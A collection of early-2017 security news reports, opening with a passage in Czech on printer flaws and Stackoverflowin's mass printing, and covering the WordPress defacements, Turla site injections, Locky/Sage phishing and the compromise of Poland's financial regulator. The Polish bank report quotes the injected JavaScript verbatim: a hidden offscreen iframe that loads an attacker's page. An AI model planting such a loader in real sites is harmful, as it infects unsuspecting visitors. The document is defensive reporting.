Problém je o to horší, že chyba není nová, ale v zařízeních je ukrytá desítky let. Dovoluje útočníkovi procházet souborový systém tiskárny, pokud k ní má přístup a může tisknout – to lze zařídit po síti nebo pomocí USB. Objevitelé chyby vytvořili nástroj v Pythonu, který dovoluje vzdáleně manipulovat s tiskovou frontou, číst soubory na disku, přistupovat k paměti tiskárny nebo zařízení fyzicky zničit.
Celkem bylo zveřejněno šest různých bezpečnostních mezer umožňujících přetečení zásobníku, ukradení hesel a zachycení tiskových úloh. Jedna z metod nazvaná Cross-Origin Resource Sharing (CORS) dokáže ve spojení s XPS využít k prolomení webové rozhraní tiskárny, které je přístupné na TCP portu 9100. Útočník podstrčí oběti stránku se skrytým iframe, který pak začne z uživatelova počítače komunikovat s tiskárnou skrytou uvnitř sítě.
Požadavek může obsahovat příkazy v jazycích PostScript nebo PJL, jak popisuje wiki na hacking-printers.net. Podle autorů je možné také posílat data z tiskárny zpět do prohlížeče, pokud se k tomu připraví správně výstupy PostScriptu. Je tak možné na straně tiskárny například emulovat HTTP server a povolit si přístup z JavaScriptu. Tiskárnu je pak možné plně ovládnout.
Hodný útočník
Nedlouho po odhalení této bezpečnostní chyby začalo hučet 160 000 tiskáren po celém světě – od velkých kancelářských strojů až po tiskárny u pokladen. Neznámý útočník s přezdívkou Stackoverflowin je všechny vzdáleně ovládl a začal na nich tisknout varovné „letáky“ s informacemi o tom, že zařízení je zranitelné a mělo by být zabezpečeno.
Stackoverflowin je ve vaší tiskárně
Obrázků existuje víc, na internetu se začínají objevovat jejich fotografie. Společné mají to, že je na nich ASCII-artový obrázek (robot/počítač) a krátký vysvětlující text. Součástí je i kontakt nebo odkaz na twitterovský účet.
Pro lásku boží, zavřete si ten port!
Útočník o sobě tvrdí, že je mu méně než 18 let a že jeho nástroj hledá veřejně dostupné tiskárny s otevřeným přístupem RAW, IPP (Internet Printing Protocol) a LPR (Line Printer Remote) na TCP portech 9100, 631 a 515. Pak na ně posílá tiskové úlohy. Prý ho nejvíce překvapilo, jak snadné to celé bylo. Pomocí zmap prohledal internet a pak spustil jednoduchý program v C, který rozeslal úlohy. Do většiny tiskáren můžete takto poslat svůj firmware – ten nemusí být podepsaný, tvrdí.
Text vypadá například takto:
stackoverflowin the hacker god has returned, your printer is part of
a flaming botnet, operating on putin's forehead utilising BTI's
(break the internet) complex infrastructure.
[ASCII ART HERE]
For the love of God, please close this port, skid.
-------
Questions?
Twitter: https://twitter.com/lmaostack
-------
Uživatelé hlásí zprávy vyjíždějící z mnoha různých modelů tiskáren, například Afico, Brother, Canon, Epson, HP, Lexmark, Konica Minolta, Oki a Samsung. Není vyloučeno, že může jít i o výrobky dalších firem. Podle mladíka prý bylo takto vytištěno varování na 160 000 zařízeních, ale je napadnutelných tiskáren je více než 300 000.
Zatím jde o „hodný spam“, který má poukázat na potenciálně vážný problém. I když vytištěná prohlášení tvrdí, že tiskárny jsou součástí botnetu, není to podle útočníka pravda. Takové riziko tu ale skutečně je, pokud by tiskárny někdo začal masivně zneužívat, mohl by z nich postavit botnet podobný Mirai a libovolně zneužívat. Přestože tato ukázka je vlastně také nelegální, zatím nebyl nikdo skutečně nijak poškozen.
Provozujete síťovou tiskárnu? Podívejte se, jaké porty vystavuje do sítě.
Palo Alto Networks Unveils Big Product Updates, New Firewalls
7.2.2017 securityweek Safety
Palo Alto Networks on Tuesday announced the launch of PAN-OS 8.0, which brings major improvements to the company’s Next-Generation Security Platform, and several new hardware and virtual firewall appliances.
According to the company, PAN-OS 8.0 introduces more than 70 new enhancements and capabilities, including for securing cloud deployments and SaaS applications, preventing the theft and abuse of credentials, simplifying security operations, and blocking threats.
The threat prevention features are designed to prevent sandbox evasion, block command and control (C&C) communications, automate intelligence integration, and improve threat detection and alerting mechanisms.
PAN-OS 8.0 is designed to address credentials theft by automatically identifying and blocking phishing websites, preventing users from entering credentials on phishing sites, and providing a policy-based multi-factor authentication framework natively in the firewall to avert the use of stolen credentials.Palo Alto Networks
As for cloud and SaaS, the latest version of the operating system brings optimized workflow automation features for cloud services, and improved visibility, reporting and automation for SaaS applications.
Palo Alto Networks also announced the release of new hardware and virtual firewall appliances that complement PAN-OS 8.0. In addition to the existing 16 hardware appliances, the company now offers six new devices designed to provide improved traffic visibility and control.
The new appliances are PA-5260, PA-5250 and PA-5220 of the PA-5200 series, PA-850 and PA-820 of the PA-800 series, and the PA-220. The PA-5200 series devices are ideal for data centers, the PA-800 series is designed for medium-size networks and branch offices, and the PA-220 is ideal for small branch offices and remote locations.
Some of the new VM-Series virtual firewalls offer performance of up to 16 Gbps and are ideal for service providers and data centers, while the lower-end models are designed for minimal resource consumption and are best suited for virtual branch offices.
Rocket AI and the next generation of AV software
7.2.2017 Kaspersky Security
The annual Conference on Artificial Intelligence and Neural Information Processing Systems (NIPS) was held in Barcelona on 5–10 December 2016. This is, most likely, one of the two most important conferences in the AI field. This year, 5,680 AI experts attended the conference (the second of these large conferences is known as ICML).
This is not the first year that Kaspersky Lab is taking part in the conference – it is paramount for our experts to be well informed on the most up-to-date approaches to machine learning. This time, there were five Kaspersky Lab employees at NIPS, each from a different department and each working with machine learning implementation in order to protect users from cyberthreats.
However, my intent is to tell you not about the benefit of attending the conference but about an amusing incident that was devised and put into action by AI luminaries.
Rocket AI is the Next Generation of Applied AI
This story was covered in detail by Medium, and I shall only briefly relate the essence of the matter.
Right as the conference was happening, the www.rocketai.org website was created with this bubble on the main page (see picture below):
Rocket AI and the next generation of AV software
Please note that this is not just AI, but the next generation of AI. The idea of the product is described below.
Rocket AI and the next generation of AV software
The Temporally Recurrent Optimal Learning™ approach (abbreviated as “TROL(L)”), which was not yet known to science, was actively promoted on Twitter by conference participants. Within several hours, this resulted in five large companies contacting the project’s authors with investment offers. The value of the “project” was estimated at tens of millions of dollars.
Rocket AI and the next generation of AV software
Now, it’s time to lay the cards on the table: the Rocket AI project was created by experts in machine learning as a prank whose goal was to draw attention to the issue that was put perfectly into words by an author at Medium.com: “Artificial Intelligence has become the most hyped sector of technology. With national press reporting on its dramatic potential, large corporations and investors are desperately trying to break into this field. Many start-ups go to great lengths to emphasize their use of “machine learning” in their pitches, however trivial it may seem. The tech press celebrates companies with no products, that contribute no new technology, and at overly-inflated cost.”
In reality, the field of machine learning features nothing new; popular approaches to artificial intelligence are actually decades-old ideas.
“Clever teams are exploiting the obscurity and cachet of this field to raise more money, knowing that investors and the press have little understanding of how machine learning works in practice,” the author added.
An Anti-Virus of the Very Next Generation
It may seem that the outcome of the prank brought out nothing new: investors feel weakness for everything they hear about. Investment bubbles have existed and will continue to exist. Just our generation saw the advent of dotcoms, biometrics, and bitcoins. We have AI now, and I am sure that 2017 will give us something new as well.
Yet, after I had taken a peek at data-security start-ups, which are springing up like mushrooms after a rain and which claim that they employ the “very real” AI (of the very next generation), an amusing idea crossed my mind.
What would happen if we did the same thing that the respected AI experts did? We could come to agreements with other representatives in the cybersecurity area (I would like to point out the principle of “coopetition”, which combines market competition and cooperation in the areas of inspection and user protection) and create a joint project. Meet Rocket AV.
Rocket AI and the next generation of AV software
If respected IT experts were to advertise it all over their Twitter accounts, then — who knows? — maybe we could attract tens of millions of dollars’ worth of investments.
But no, it’d probably be better for us to continue doing what we are best at: protecting users from cyberthreats. This is the essence of True CyberSecurity.
Smart TV Maker Fined $2.2 Million For Spying on Its 11 Million Users
7.2.2017 thehackernews Virus
Smart TV Maker 'Vizio' Fined $2.2 Million For Spying on Its 11 Million Users
Your government is spying on you! Businesses are spying on you! Your phone and browser are constantly spying on you! Even your TV is spying on you!
Yes, you should also worry about your "smart" TV, as one of the world's biggest smart TV makers Vizio has been caught secretly collecting its consumers' data through over 11 Million smart TVs and then selling them to third-parties without the user's explicit consent.
But the good news is that the home entertainment hardware maker has been fined heavily for this practice.
The US Federal Trade Commission (FTC) announced on Monday that Vizio had spied on almost every customer from its Vizio smart TVs through its Smart Interactivity feature, and rather than fighting back the accusation any longer, the company has agreed to pay a $2.2 Million fine to settle the lawsuit.
"To settle the case, Vizio has agreed to stop unauthorized tracking, to prominently disclose its TV viewing collection practices, and to get consumers’ express consent before collecting and sharing viewing information," the FTC says.
"In addition, the company must delete most of the data it collected and put a privacy program in place that evaluates Vizio’s practices and its partners."
According to FTC, the smart TV maker installed data tracking software to collect viewing habits of 11 million of its smart TVs without informing its customers or seeking their consent.
Besides this, the company also collected each household's IP address, nearby access points, and zip code, and shared that information with other third-party companies, who used it for targeting advertising towards Vizio TV owners.
The data tracking software reportedly worked by collecting a selection of on-screen pixels every second your TV was on, and then compared that data to a database of known movies, television shows, and commercial commercials, and another type of video content. This practice is known as automatic content recognition (ACR).
According to the FTC, Vizio also recorded the date, time, channel of TV shows, and whether you watched the program live or recorded and took all that information and connected it to your IP address.
With this data in hand, anyone can know you and your television watching habits, and according to the complaint filed by the US Federal Trade Commission, "Vizio then turned that mountain of data into cash by selling consumers' viewing histories to advertisers and others."
However, Vizio has agreed to stop unauthorized tracking, prominently disclose its TV viewing collection practices, and get consumers' express consent before collecting or sharing their information with other companies.
How to Stop Your Smart TV From Spying on You
To check if your smart TV is also spying on you, open Vizio TV's settings menu or directly open HDTV Settings app and check if options under "Automated content recognition (ACR)" are ON. If Yes, follow below-mentioned steps to turn it off:
Open Setting Menu and Select System
Select Reset & Admin
Select Smart Interactivity.
Press arrow to change setting to off
Besides this, Vizio must also delete most of the data the company gathered and put a privacy program in place that evaluates its practices and partners.
Windows SMB 0-Day Risk Downplayed
7.2.2017 securityweek Vulnerebility
A 0-day vulnerability (CVE-2017-0016) affecting Windows’ SMBv3 (Server Message Block) protocol that was revealed last week is no longer considered a Critical issue, but High-risk.
The issue resides in the manner in which Windows handles SMB traffic and allows an unauthenticated attacker to remotely exploit and cause a denial of service. The issue is triggered when a vulnerable Windows client system connects to a malicious SMB server.
SMB is an application-layer network protocol that allows computers to access files, printers, serial ports, and miscellaneous communications between nodes on a local network. It also offers an authenticated inter-process communication mechanism.
The flaw was publicly revealed after the security researcher who discovered it published a proof-of-concept exploit on GitHub. The CERT Coordination Center (CERT/CC) at Carnegie Mellon University assessed the issue as critical and even suggested that it would have a severity score of 10, because of a possible exploitation for arbitrary code execution.
In the meantime, however, CERT revised the initial advisory and removed all mentions of arbitrary code execution, while also downgrading the severity score. With a CVSS (Common Vulnerability Scoring System) score of 7.8, the bug is rated High risk in the updated advisory.
“To be vulnerable, a client needs to support SMBv3, which was introduced in Windows 8 for clients and Windows 2012 on servers,” Johannes B. Ullrich, Ph.D., Dean of Research for the SANS Technology Institute, notes.
Initially mentioning only Windows 10 and Windows 8.1 as confirmed vulnerable platforms, the advisory has been modified to refer to their server counterparts as well: “We have confirmed the crash with fully-patched Windows 10 and Windows 8.1 client systems, as well as the server equivalents of these platforms, Windows Server 2016 and Windows Server 2012 R2,” CERT notes.
As before, the advisory points out that no practical solution to the issue is yet known, but that a workaround would involve blocking outbound SMB connections (TCP ports 139 and 445 along with UDP ports 137 and 138) from the local network to the WAN.
Given that this is no longer considered a Critical flaw, Microsoft is unlikely to patch it via an out-of-band update, but rather via the monthly set of security patches, which are expected to arrive next week. SecurityWeek contacted Microsoft for specifics on this but hasn’t heard back yet.
Turla-Linked Group Targets Embassies, Ministries
7.2.2017 securityweek Virus
Researchers at Forcepoint Security Labs have been monitoring the activities of a threat group that has targeted the websites of ministries, embassies and other organizations from around the world in a reconnaissance campaign.
While it’s unclear exactly who is behind the operation and what their motives are, evidence points to an advanced persistent threat (APT) actor that leverages techniques similar to the ones used by the Russia-linked group known as Turla.
According to the security firm, the attacks targeted the websites of foreign affairs ministries in Moldova, Kyrgyzstan and Uzbekistan; embassies of Russia, Zambia, Jordan and Iraq; a political party, a sports association and a government-run sustainability organization in Austria; a news company in Somalia, a socialist organization in Spain, a road safety entity in Ukraine; a French international cooperation organization; and a plant society and a union in Africa.
Experts pointed out that all of the targeted embassy websites belong to embassies located in the United States, in Washington D.C.
The attackers injected malicious code into each of the compromised sites in an effort to profile their visitors. The malicious code is disguised as a script associated with the web analytics service Clicky.
The hacked sites communicate with various domains; the oldest of them, nbcpost[.]com, registered in December 2015. In November 2016, the attackers started using psoncorp[.]com and mentalhealthcheck[.]net, both registered in February 2016, and this week they began using travelclothes[.]org, a domain registered in November.
Researchers said a majority of the websites were breached in April 2016 and some of them were under the attackers’ control for up to 10 months.
Forcepoint believes these attacks could be linked to Turla, also known as Waterbug, Venomous Bear and KRYPTON. This theory is based on the overlap in targets and the fact that Turla has been known to use fake web analytics scripts in their reconnaissance campaigns.
Switzerland’s GovCERT reported in May 2016 that the Turla attack aimed at Swiss defense firm RUAG involved malicious code disguised as Google Analytics scripts.
Kaspersky Lab confirmed recently that Turla, which has been around since at least 2007, is still active. Researchers discovered new JavaScript malware used by the group in attacks aimed at organizations located in Greece, Qatar and Romania.
WordPress content injection flaw abused in defacement campaigns
7.2.2017 securityaffairs Vulnerebility
According to experts at the security firm Sucuri, a critical content injection flaw in WordPress recently disclosed has already been exploited to deface thousands of websites.
Recently a critical vulnerability has been discovered in the WordPress CMS, it is a zero-day content injection flaw that affects the WordPress REST API.
The vulnerability was discovered by a security researcher at firm Sucuri who explained that the flaw could be exploited by an unauthenticated attacker to inject malicious content as well as for privilege escalation.
The attacker could exploit the zero-day content injection flaw to modify posts, pages, as well any other content.
“This privilege escalation vulnerability affects the WordPress REST API that was recently put into widespread use across WordPress sites with the introduction of official API endpoints in version 4.7.” states a blog post published by Sucuri. “One of these endpoints allows access (via the API) to view, edit, delete and create posts. Within this particular endpoint, a subtle bug allows visitors to edit any post on the site.
The REST API is enabled by default on all sites using WordPress 4.7 or 4.7.1. If your website is on these versions of WordPress then it is currently vulnerable to this bug.”
The impact of the flaw is severe, at least 18 million websites run the popular WordPress CMS, roughly 26% of the top 10,000 websites are running WordPress.
Experts from Sucuri have worked with the WordPress development team that fixed the zero-day content injection vulnerability in the last release 4.7.2 issued on January 26.
The bad news is that many WordPress websites still haven’t been updated leaving the installation open to the attacks.
Experts from Sucuri reported first attacks leveraging the above vulnerability less than 48 hours after its disclosure.
“In less than 48 hours after the vulnerability was disclosed, we saw multiple public exploits being shared and posted online. With that information easily available, the internet-wide probing and exploit attempts began.” states a report published by Sucuri.
The experts observed several massive defacement campaigns targeting WordPress across the world, in one of these campaigns, the hackers replaced the content of more than 60,000 web pages with “Hacked by” statements.
The other three operations, two of which seem to share a single IP address, have each targeted roughly 500 pages.
Sucuri monitored other three operations, two of which are linked to the same IP address as a source and have each targeted roughly 500 pages.
The risk when dealing with such kind of massive defacement is that crooks will leverage the vulnerability in WordPress to conduct Black SEO campaigns.
“What we expect to see is a lot more SEO spam (Search Engine Poisoning) attempts moving forward. There’s already a few exploit attempts that try to add spam images and content to a post. Due to the monetization possibilities, this will likely be the #1 route to abuse this vulnerability.” states Sucuri.
Search engine poisoning is a profitable activity for the cyber crime ecosystem.
Sucuri WAF network has observed a significant increase of the number of exploit attempts, in the last week, as reported in the following graph.
A recent report published by Sucuri states that more than half of the WordPress websites hijacked in 2016 were running an outdated version. By default, WordPress installations are updated automatically, so it is strongly suggested to website administrators to avoid disabling this feature.
Many WordPress Sites Hacked via Recently Patched Flaw
7.2.2017 securityweek Hacking
The critical vulnerability disclosed last week by WordPress developers has already been exploited to hack thousands of websites, security firm Sucuri warned on Monday.
When WordPress 4.7.2 was released on January 26, the developers of the content management system (CMS) informed users that the latest version patched three vulnerabilities, including SQL injection, cross-site scripting (XSS) and access control issues.
Roughly one week later, developers admitted that version 4.7.2 patched another flaw, described as an unauthenticated privilege escalation and content injection vulnerability affecting the REST API. The security hole allows an attacker to modify the content of any post or page on a targeted site.
The flaw, identified by researchers at Sucuri, was disclosed one week after the release of WordPress 4.7.2 to give users enough time to patch their installations. However, according to Sucuri, many WordPress websites still haven’t been updated.
Sucuri, which has tracked four different defacement campaigns, started seeing the first attacks leveraging this vulnerability less than 48 hours after disclosure.
In one of these campaigns, attackers replaced the content of more than 60,000 web pages with “Hacked by” messages. The other three operations, two of which seem to share a single IP address, have each targeted roughly 500 pages.
SecurityWeek has noticed that some of the compromised websites have also been re-defaced by a fifth actor. Fortunately, some of the affected sites have already been cleaned up and updated to WordPress 4.7.2.
While these attacks appear to be carried out mostly by script kiddies looking to boost their online reputation, researchers believe the vulnerability will be increasingly exploited for search engine poisoning.
“There’s already a few exploit attempts that try to add spam images and content to a post. Due to the monetization possibilities, this will likely be the #1 route to abuse this vulnerability,” explained Daniel Cid, CTO and founder of Sucuri.
The company’s WAF network has seen an increasing number of exploit attempts, reaching nearly 3,000 on Monday.
A recent report from Sucuri showed that more than half of the WordPress websites hijacked last year were outdated at the point of infection. By default, WordPress installations are updated automatically when a new version becomes available, but some administrators have disabled the feature, often due to concerns that the updates may break their websites.
Hackers Can Intercept Data From Popular iOS Apps
7.2.2017 securityweek Apple
Dozens of popular iOS applications are affected by vulnerabilities that allow man-in-the-middle (MitM) attackers to silently intercept data from connections that should be protected by TLS, a study has found.
The developers of verify.ly, a service designed for finding security issues in iOS apps, analyzed applications in the Apple App Store and identified hundreds that are likely vulnerable to data interception. Experts have tested each of them on an iPhone running iOS 10 and confirmed that 76 had been vulnerable.
According to Will Strafach, iOS security expert and developer of verify.ly, the affected applications have been downloaded more than 18 million times. The vulnerability is considered high risk in the case of 19 of the 76 applications, as they expose financial or medical service credentials or session authentication tokens.
The medium risk category includes 24 iOS apps, which also expose login credentials and session authentication tokens. The names of the high and medium risk apps have not been disclosed in order to give vendors time to patch the flaws.
Researchers identified 33 low risk applications, which allow attackers to intercept only partially sensitive information, including analytics data, email addresses, and login credentials that would only be entered on a trusted network. The list includes banking, VPN, entertainment, news, stock trading, chat, and Snapchat-related apps.
“This sort of [MitM] attack can be conducted by any party within Wi-Fi range of your device while it is in use. This can be anywhere in public, or even within your home if an attacker can get within close range,” Strafach explained. “Such an attack can be conducted using either custom hardware, or a slighly modified mobile phone, depending on the required range and capabilities. The best similar and well-understood form of attack to this would be the ability to read data from credit cards at a close range.”
Applications are vulnerable to these types of attacks due to the way their developers implement network-related code, which means only the developers can properly address the issue. However, end-users can protect themselves against potential attacks by utilizing the affected applications only over a cellular data connection, which is much more difficult to intercept compared to Wi-Fi.
An automated analysis of Android apps conducted back in 2014 by CERT/CC showed that thousands of applications were vulnerable to MitM attacks, and many of them are still vulnerable today.
76 Popular iOS apps are vulnerable to man-in-the-middle (MITM) attacks
7.2.2017 securityweek Apple
A study conducted on iOS mobile apps revealed that many of them are affected by security vulnerabilities that expose users to man-in-the-middle (MitM) attacks.
A new study confirms that dozens of iOS apps are affected by vulnerabilities that could be exploited by hackers to run man-in-the-middle (MitM) and intercept data from connections even if protected by TLS.
The study was conducted by the developers at verify.ly, a service that analyzes iOS apps searching for security issues. The experts analyzed applications in the Apple App Store and discovered hundreds of security issues that potentially expose mobile users to MITM attacks. All the applications have been tested on iPhone mobile devices running iOS 10 version and confirmed that 76 had been vulnerable.
The impact is serious if we consider that the affected applications account for more than 18 million downloads. The vulnerability is considered high risk in the case of 19 of the 76 applications. The applications expose sensitive data, including financial or medical service credentials or session authentication tokens.
“During the testing process, I was able to confirm 76 popular iOS applications allow a silent man-in-the-middle attack to be performed on connections which should be protected by TLS (HTTPS), allowing interception and/or manipulation of data in motion.” reads the blog post published by the researchers.
“According to Apptopia estimates, there has been a combined total of more than 18,000,000 (Eighteen Million) downloads of app versions which are confirmed to be affected by this vulnerability.”
Examining the key findings of the report we can see that:
the medium-risk category includes 24 iOS apps that expose login credentials and session authentication tokens.
the low-risk category includes 33 iOS apps that are affected by flaws that could be exploited by attackers to intercept only partially sensitive information such as email addresses and login credentials.
“This sort of attack can be conducted by any party within Wi-Fi range of your device while it is in use. This can be anywhere in public, or even within your home if an attacker can get within close range,” continues the post. “Such an attack can be conducted using either custom hardware, or a slighly modified mobile phone, depending on the required range and capabilities. The best similar and well-understood form of attack to this would be the ability to read data from credit cards at a close range.”
The security issues discovered by the experts are the result of the lax of adoption of secure coding techniques. Waiting for a fix, the users of the affected iOS apps need to avoid using them on Wi-Fi networks.
Phishme observed operators behind Locky and Sage ransomware share delivery infrastructure
7.2.2017 securityaffairs Virus
PhishMe security researchers discovered that the Locky and Sage ransomware were recently observed being distributed by the same delivery infrastructure.
It’s a common habit of cyber criminals to share delivery infrastructure to maximize the use of their resource and minimize the cost,
Recently the Locky ransomware was observed being distributed through the delivery infrastructure used to spread the Sage ransomware.
A couple of weeks ago, researchers from the Cisco Security Team has noticed traces of traffic from the dormant Necurs botnet and warned of a possible new massive ransomware spam campaign.
Now researchers at Phishme, reported cybercriminals are sharing the delivery infrastructure for both Sage and Locky, likely because operators behind the Locky threat are working on securing new distribution channels, after the Necurs botnet, the main driver behind the Locky and Dridex activity, slightly vanished.
“Sage and Locky Ransomware Now Sharing Delivery Infrastructure in Phishing Attacks” titled a blog post published by Phishme.
The Sage ransomware was recently emerged, the malware researchers spotted in December 2016, it was spread through phishing messages using malicious attachments. Threat actors frequently changed tactic to elude spam filters, for example, they used in the recent campaigns random numbers in email subjects.
“Following this early distribution, threat actors moved toward the mainstream in a major way. The phishing email subjects used random numbers to help elude some basic filters and leveraged business-related themes rather than explicit or racy narratives. The body of these emails explained that a financial transaction had been rejected and claimed that details about the failure could be found an attached document.” reads the analysis published by Phishme.
Some of the distribution emails didn’t have a subject line and used recipient’s name as part of the attachment’s file name. The attachment is a double-zipped archive containing a malicious Office document or .js file that is used to launch the attack.
Some emails claimed to be containing information about a financial transaction that had been rejected, or that a deposit of a refund had been failed due to the cancellation of an order.
“In this more polished campaign, the .zip file (named “document_1.zip”) contained a JavaScript application which, when run, facilitated the download of a Windows executable representing the Sage Ransomware to be downloaded.” continues PhishMe.”In this case, the payload binary was retrieved from the domain affections[.]top, however the payment gateway’s Tor site, as well as the unusual Tor2Web gateway addresses on er29sl[.]com and rzunt3u2[.]com remained the same.”
Starting on January 26, 2017, the experts noticed a phishing campaign used to deliver the Locky ransomware with many similarities with a campaign used to spread the Sage ransomware. The researcher observed the use of the domain affections[.]top as part of the delivery infrastructure on Monday, January 30.
“This connection pushes the narrative forward in yet another way as the Locky distribution in question was yet another example of that ransomware being paired with the Kovter Trojan,” continues PhishMe notes.
Researchers at Microsoft demonstrated on the past the link between Locky and Kovter threats, they detailed a technique adopted by crooks which first attempted to drop Locky ransomware, but that switched to Kovter malware in case of failure.
The distribution of both the two threats, Sage and Locky, from the same delivery infrastructure let the experts in to believe that operators were likely using a service offered in the criminal underground to spread the ransomware.
“First, the shared infrastructure provides a high-fidelity indicator of compromise that can be preemptively blocked to foil the delivery of multiple ransomware varieties. Secondly, since the qualitative tactics, techniques, and procedures used in the distribution of these ransomware varieties are nearly identical and closely resemble classic phishing narratives easily recognizable to users prepared and empowered to identify and report phishing emails,” added PhishMe.
Crooks hacked Polish banks with a malware planted on Government site
7.2.2017 securityaffairs Virus
Several Polish banks confirmed their systems were infected with a malware after their staff visited the site of the Polish Financial Supervision Authority.
Polish banks are investigating a massive cyber attack after a malware was spotted on several servers of the financial institutions.
The cyber attack was first reported by the Zaufana Trzecia Strona, a local Polish news site on Friday, last week.
The interesting aspect of the attack is that crooks used the Polish financial regulator, the Polish Financial Supervision Authority (KNF), to spread the malware.
A spokesman for the KNF confirmed that internal systems of the regulator had been compromised by hackers “from another country”. The attackers dropped on the servers the malicious files that were used in the attacks against the Polish banks.
In order to avoid spreading the malware, the authorities took the decision to shut down the entire network at the KNF “in order to secure evidence.”
Polish banks malware
The malware-based attack was confirmed by a number of banks that are currently investigating the security breach.
The IT staff at the banks noticed anomalous traffic associated with the presence of executables on several servers.
“It has been a busy week in SOCs all over the polish financial sector. At least a few of polish 20-something commercial banks have already confirmed being victims of a malware infection while others keep looking. Network traffic to exotic locations and encrypted executables nobody recognized on some servers were the first signs of trouble.” reported the badcyber.com website “A little more than a week ago one of the banks detected strange malware present in a few workstations. Having established basic indicators of compromise managed to share that information with other banks, who started asking their SIEMs for information. In some cases, the results came back positive.”
According to first findings of the investigation, the KNF’s website had been compromised that had modified one of the site’s JavaScript files.
Ironically the KNF is the regulating body that monitors and promotes security measures adopted by Polish banks.
The injected JS file resulted in visitors to the KNF website loading an external JS file which then download the malware from an external server and installed it.
To unauthorized code was stored in the following file:
http://www.knf.gov.pl/DefaultDesign/Layouts/KNF2013/resources/accordian-src.js?ver=11
and looked like that:
document.write("<div id='efHpTk' width='0px' height='0px'><iframe name='forma' src='https://sap.misapor
.ch/vishop/view.jsp?pagenum=1' width='145px' height='146px' style='left:-2144px;position:absolute;top
:0px;'></iframe></div>");
At the time I was writing, both the KNF and the Polish government confirmed that there is no indication that crooks have stolen money from the banks.
“Significantly, we do not have so far any information related to these attacks, successful or unsuccessful attempt to steal funds from bank accounts. This may indicate that the goal of the attackers was information, not money.” reported the local media zaufanatrzeciastrona.pl. “In at least one case, it is known that a large amount of data has been transferred from the bank’s network to external servers, but due to the fact that the data were prior to shipment by criminals encrypted, to determine what was stolen can be difficult.”
The unique certainly is that the incident could be considered to be the largest system hack of ever in the country’s financial sector.
The IOCs are available on the badcyber.com website.
Polish Banks Hacked using Malware Planted on their own Government Site
7.2.2017 thehackernews Crime
In what considered to be the largest system hack in the country's history and a massive attack on the financial sector, several banks in Poland have been infected with malware.
What's surprising? The source of the malware infection is their own financial regulator, the Polish Financial Supervision Authority (KNF) -- which, ironically, is meant to keep an eye out for the safety and security of financial systems in Poland.
During the past week, the security teams at several unnamed Polish banks discovered malicious executables on the workstations of several banks.
The KNF confirmed that their internal systems had been compromised by someone "from another country," although no specifications were provided.
After downloads of suspicious files that were infecting various banking systems had been discovered on the regulator's servers, the KNF decided to take down its entire system "in order to secure evidence."
Here's what happened:
An unknown attacker compromised the KNF's website for well over a week by modifying one of the site's JavaScript files, making visitors to the regulator's site load the malicious JavaScript file, which then downloaded the malicious payloads.
Once downloaded and executed, the malware connected to some foreign servers to perform various malicious tasks such as reconnaissance, data exfiltration, and post exploitation.
This particular malware appears to be a new strain of nasty software which has never seen before in live attacks and has a zero detection rate on VirusTotal.
In some cases, the attackers even managed to gain control over critical servers within the targeted bank's infrastructures.
Security blogger BadCyber spoke to several banks, and some 20 commercial banks across Poland have already confirmed being victims of a malware infection while other banks keep looking.
The affected banks discovered the encrypted executable files on several servers and unusual network traffic going to uncommon IP addresses situated in other foreign countries.
Both the KNF and the Polish government confirmed local Polish media that the investigation is ongoing and that there is no indication of people's money being affected in the attack and no operations were affected.
US Judge Ordered Google to Hand Over Emails Stored On Foreign Servers to FBI
7.2.2017 thehackernews Security
In this world of global mass surveillance by not the only US, but also intelligence agencies across the world, every other country wants tech companies including Google, Apple, and Microsoft to set-up and maintain their servers in their country to keep their citizen data within boundaries.
Last year, Microsoft won a case which ruled that the US government cannot force tech companies to hand over their non-US customers' data stored on servers located in other countries to the FBI or any other federal authorities.
However, a new notable ruling just goes against the court judgment last year, raising concerns regarding people's privacy.
A US magistrate reportedly ruled Friday that Google has to comply with FBI search warrants seeking customer emails stored on servers outside of the United States, according to Reuters.
U.S. Magistrate Judge Thomas Rueter in Philadelphia noted that transferring emails from outside servers so FBI could read them locally as part of a domestic fraud probe didn't qualify as a seizure because there's "no meaningful interference" with the account holder's "possessory interest" in the data sought.
Here's what Judge Rueter says:
"Google regularly transfers user data from one data center to another without the customer's knowledge. Such transfers do not interfere with the customer’s access or possessory interest in the user data. Even if the transfer interferes with the account owner's control over his information, this interference is de minimis [minimal] and temporary."
In August 2016, the search engine giant was ordered to comply with two FBI search warrants related to criminal investigations, but Google provided only the data stored on its US servers.
So, the government filed a motion to compel Google to hand over the rest of the information to the FBI.
When the company referred to the last year's ruling in favor of Microsoft by the US Court of Appeals for the Second Circuit in a similar case, the judge said Google was found processing its foreign-stored data in a way that made it impossible for the US government to ask a foreign state for legal assistance.
However, Google made it clear that a search warrant, if granted, can give the government access to email content, while subpoenas and court orders only let them access non-content data, like an account creation number, phone number, and sign-in IP address.
According to the new ruling, the search engine giant receives over 25,000 requests every year from United States authorities for disclosures of user data in criminal matters.
Google is obviously unhappy with the result and intends to fight it back.
Carbon Black Unveils "Streaming Prevention" to Thwart Attacks in Progress
7.2.2017 securityweek Virus
New Streaming Prevention Technology Collects, Correlates and Analyzes Endpoint Events in Real-time to Detect and Stop Attacks In Progress
Malicious attacks are increasingly leveraging non-malware methodologies. Already, 53% of attacks do not use malware; and it is estimated that over the next 90 days, one-third of organizations will face a non-malware attack. It is claimed that these attacks will likely succeed because current AV technology, whether first-gen or second-gen machine learning technology, is focused almost entirely on detecting a malicious file dropped on the endpoint.
To combat this new attack vector, Carbon Black has today announced its new Streaming Prevention technology. Carbon Black CTO Mike Viscuso talked to SecurityWeek to explain why this new approach is necessary, and how it works.
Carbon Black logoViscuso described standard AV as 'point-in-time' prevention; and illustrated it with an example from the NSA. Since the NSA is offensive as well as defensive, it checks its own tools against standard defenses. When a new McAfee product was launched, it was tested against NSA tools -- and it succeeded in blocking one of them. This tool spun up a command shell that could be used remotely. To get by it, the NSA operatives simply renamed the command shell to something else; and it worked.
The point, explained Viscuso, is that most anti-malware products look for 'points', usually files. They do not look for behavior in context. If the attacker does not drop a file that can be analyzed, or if it involves something not recognized by the defense, it is simply allowed. "Many of the big breaches in recent years, Yahoo, Oracle and DNC, for example, all resulted from a non-malware attack."
This new attack approach leverages the existing power of the operating system. It uses trusted OS tools such as PowerShell and WMI to do the work. He gave an example: "A compromised website could require Flash. Flash could be exploited to run PowerShell. PowerShell would conduct the attack." There is, he says, nothing in this process for contemporary anti-malware products to detect and prevent.
